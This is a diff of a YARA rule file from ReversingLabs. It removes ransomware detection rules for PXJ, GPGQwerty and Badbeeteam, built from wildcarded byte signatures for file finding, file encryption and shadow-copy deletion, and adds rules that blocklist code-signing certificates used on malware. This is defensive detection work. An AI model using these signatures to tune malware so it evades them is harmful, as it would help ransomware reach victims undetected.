-		id = "c1549905-5b31-55c0-a275-0ab8133b3504"
-		date = "2020-07-07"
-		modified = "2020-07-15"
+		id = "2b35f2db-ebf1-5533-858c-644dbd6dfb2b"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.PXJ.yara#L1-L158"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15004-L15020"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e88d27dcd7ad3af459bd7e34fcc827822365441446b0e4e7bbec399c9a948cb7"
+		logic_hash = "fbdd37e050d68c4287e897f050a673aea071df105a35b07475d3233da3f03feb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "PXJ"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 8B D9 68 ?? ?? ?? ??
-            33 F6 8D 8D ?? ?? ?? ?? 33 C0 56 51 89 9D ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 53 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ??
-            ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ??
-            ?? ?? 8A 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 53 8D 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B
-            50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ??
-            3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66
-        }
-		$find_files_p2 = {
-            3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB
-            ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 9F ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FF
-            66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
-            ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ??
-            ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ??
-            ?? ?? 52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8B D1 83 C4 ?? 0B D0 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 74 ?? 50 51 8D
-            85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3A C1 75 ?? 01 8F ?? ?? ?? ?? 11
-            B7 ?? ?? ?? ?? EB ?? 01 8F ?? ?? ?? ?? 11 B7 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 8B 4D ?? 5E 33 CD B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1
-            ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 68
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 68 ?? ?? ?? ?? 50 89 85 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 4D
-            ?? 8B 55 ?? 51 52 E8 ?? ?? ?? ?? 0B C2 74 ?? 53 FF 15 ?? ?? ?? ?? B0 ?? E9 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 33 DB 8D 85 ?? ?? ?? ?? 53 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 51 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 33 F6 6A ?? 53 E8 ?? ?? ?? ?? 88 44 35 ??
-            46 83 FE ?? 7C ?? 8D 55 ?? 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ??
-            ?? ?? ?? 8D B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B CE 89 5D ?? E8 ?? ?? ?? ?? 81 EC ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B F4 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? 6A ?? 51
-        }
-		$encrypt_files_p2 = {
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? 8B 95
-            ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B B5 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 56
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 FF 15 ?? ?? ?? ?? 32 C0 E9 ?? ?? ?? ?? 53 8D 85 ??
-            ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
-            8B 3D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 6A ?? F7 D8 99 53 52 50
-            56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52
-            8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 50 8D
-            95 ?? ?? ?? ?? 52 56 FF D7 85 C0 0F 84 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 77 ?? 81 BD ??
-            ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 11 9D ?? ?? ?? ?? 8B 9D
-            ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33 D2 52 52 52 33 C9 51 50
-            FF 15 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B C6 8D
-        }
-		$encrypt_files_p3 = {
-            48 ?? 8B FF 66 8B 10 83 C0 ?? 66 85 D2 75 ?? 2B C1 6A ?? D1 F8 8D 8D ?? ?? ?? ?? 51
-            8D 14 00 8B 83 ?? ?? ?? ?? 52 56 50 FF D7 8B 93 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ??
-            51 6A ?? 68 ?? ?? ?? ?? 52 FF D7 8B 93 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ??
-            8D 4D ?? 51 52 FF D7 8B 8B ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ??
-            ?? 51 FF D7 8B 8B ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50
-            51 FF D7 8B B5 ?? ?? ?? ?? 6A ?? 33 C9 51 51 B8 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
-            85 C0 74 ?? 33 DB EB ?? 83 85 ?? ?? ?? ?? ?? 11 9D ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ??
-            52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ??
-            ?? 8B 9D ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 52 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 95
-            ?? ?? ?? ?? 83 C4 ?? 52 FF 15 ?? ?? ?? ?? 33 C9 51 51 33 C0 51 50 8B 83 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 56
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 94 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
-            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$delete_volumes_snapshots_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 33 FF 57 57 89
-            85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF D6 57 68 ??
-            ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF
-            D6 57 57 8D 8D ?? ?? ?? ?? 51 57 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ??
-            6A ?? 57 57 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F
-            84 ?? ?? ?? ?? 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ??
-            ?? ?? 89 A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 33 FF 89 7D ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D 9B ?? ?? ?? ?? 8A 08 40 84
-            C9 75 ?? 2B C2 57 8D 95 ?? ?? ?? ?? 52 50 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ??
-            ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? 88 0E E8 ?? ?? ?? ?? 8D B5 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 00 50 53 FF 15 ?? ??
-            ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
-            ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF
-            15 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8B FF 66 8B 10 66 3B 11 75 ??
-            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
-        }
-		$delete_volumes_snapshots_p2 = {
-            EB ?? 1B C0 83 D8 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? EB ?? 8D 64 24 ?? 8B BD ?? ?? ?? ?? BA ?? ?? ?? ?? 8B
-            CE D3 E2 85 95 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4E ?? 66 89 8D ?? ?? ?? ?? 33 C9 6A
-            ?? 51 8D 95 ?? ?? ?? ?? 52 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 9F ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83
-            C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
-            ?? ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 33
-            FF 57 8D 8D ?? ?? ?? ?? 51 2B C2 50 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72
-            ?? 8B 00 50 53 FF 15 ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ??
-            ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 89 B5 ??
-            ?? ?? ?? 89 BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 53 89 B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 8B B5 ?? ?? ?? ?? 46 89 B5 ?? ?? ?? ?? 83 FE ?? 0F 8C ?? ?? ?? ?? EB ?? 57
-            8D 9F ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
-            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $delete_volumes_snapshots_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "54:00:d1:c1:40:65:28:b1:ef:62:59:76" and 1474266628 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Gpgqwerty : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_013472D7D665557Bfa0Dc21B350A361B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GPGQwerty ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8848e00a-a695-575b-a29d-fc9521859e12"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "9b63f06d-9808-5936-aad2-d387c74eccdd"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.GPGQwerty.yara#L1-L83"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15022-L15038"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e59adadd66b4d242ac7337ce4b3c3ec6c60724f4cf5b86305f1e31b88745928c"
+		logic_hash = "ab908ef0fca56753bcba8bc85e2fdf5859b4e226c179ec5c6eb6eb3dc4014a8e"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GPGQwerty"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            56 53 89 D3 81 EC ?? ?? ?? ?? 8D 54 24 ?? 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 83 EC
-            ?? 83 F8 ?? 89 C6 74 ?? 31 C0 8D 4B ?? 66 89 43 ?? 31 C0 EB ?? 0F B7 43 ?? 83 C0 ??
-            66 3D ?? ?? 66 89 43 ?? 83 D1 ?? 0F B7 C0 0F B6 44 04 ?? 84 C0 88 01 75 ?? 8B 44 24
-            ?? 24 ?? 83 F8 ?? 76 ?? C7 43 ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89 F0 5B 5E C3 66 90
-            89 43 ?? 81 C4 ?? ?? ?? ?? 89 F0 5B 5E C3 E8 ?? ?? ?? ?? 89 C3 E8 ?? ?? ?? ?? 83 F8
-            ?? 89 03 74 ?? E8 ?? ?? ?? ?? 81 38 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? 83 38 ?? 74 ??
-            E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? E8 ??
-            ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? 90 56 53 89 D3 81 EC ?? ?? ?? ?? 8D 54 24 ?? 89 04
-            24 89 54 24 ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 89 C6 74 ?? 31 C0 8D 4B ?? 66 89 43 ??
-            31 C0 EB ?? 0F B7 43 ?? 83 C0 ?? 66 3D ?? ?? 66 89 43 ?? 83 D1 ?? 0F B7 C0 0F B6 44
-            04 ?? 84 C0 88 01 75 ?? 8B 44 24 ?? 24 ?? 83 F8 ?? 77 ?? 89 43 ?? 81 C4 ?? ?? ?? ??
-            89 F0 5B 5E C3 8D B4 26 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89 F0 5B
-            5E C3 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 81 C4 ?? ?? ??
-            ?? 89 F0 5B 5E C3
-        }
-		$find_files_p2 = {
-            8B 45 ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 95 C0 84
-            C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
-            ?? 85 C0 74 ?? 8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85
-            C0 74 ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ??
-            ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 84
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 83
-            C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45
-            ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E8
-        }
-		$encrypt_files = {
-            C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83
-            C0 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44
-            24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ??
-            ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 C2 B8
-            ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8D 85 ?? ?? ?? ?? 01 D0 66 C7 00 ?? ??
-            8B 45 ?? 83 E8 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Zhang" and pe.signatures [ i ] . serial == "01:34:72:d7:d6:65:55:7b:fa:0d:c2:1b:35:0a:36:1b" and 1470960000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Badbeeteam : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_66C758A22Bfbbce327616815616Ddd07 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Badbeeteam ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "39490b21-34b9-51cb-a3ed-672b3186a233"
-		date = "2020-11-13"
-		modified = "2020-11-13"
+		id = "4a7130ad-8b66-52a1-afd2-6d10776b4451"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Badbeeteam.yara#L1-L137"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15040-L15056"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
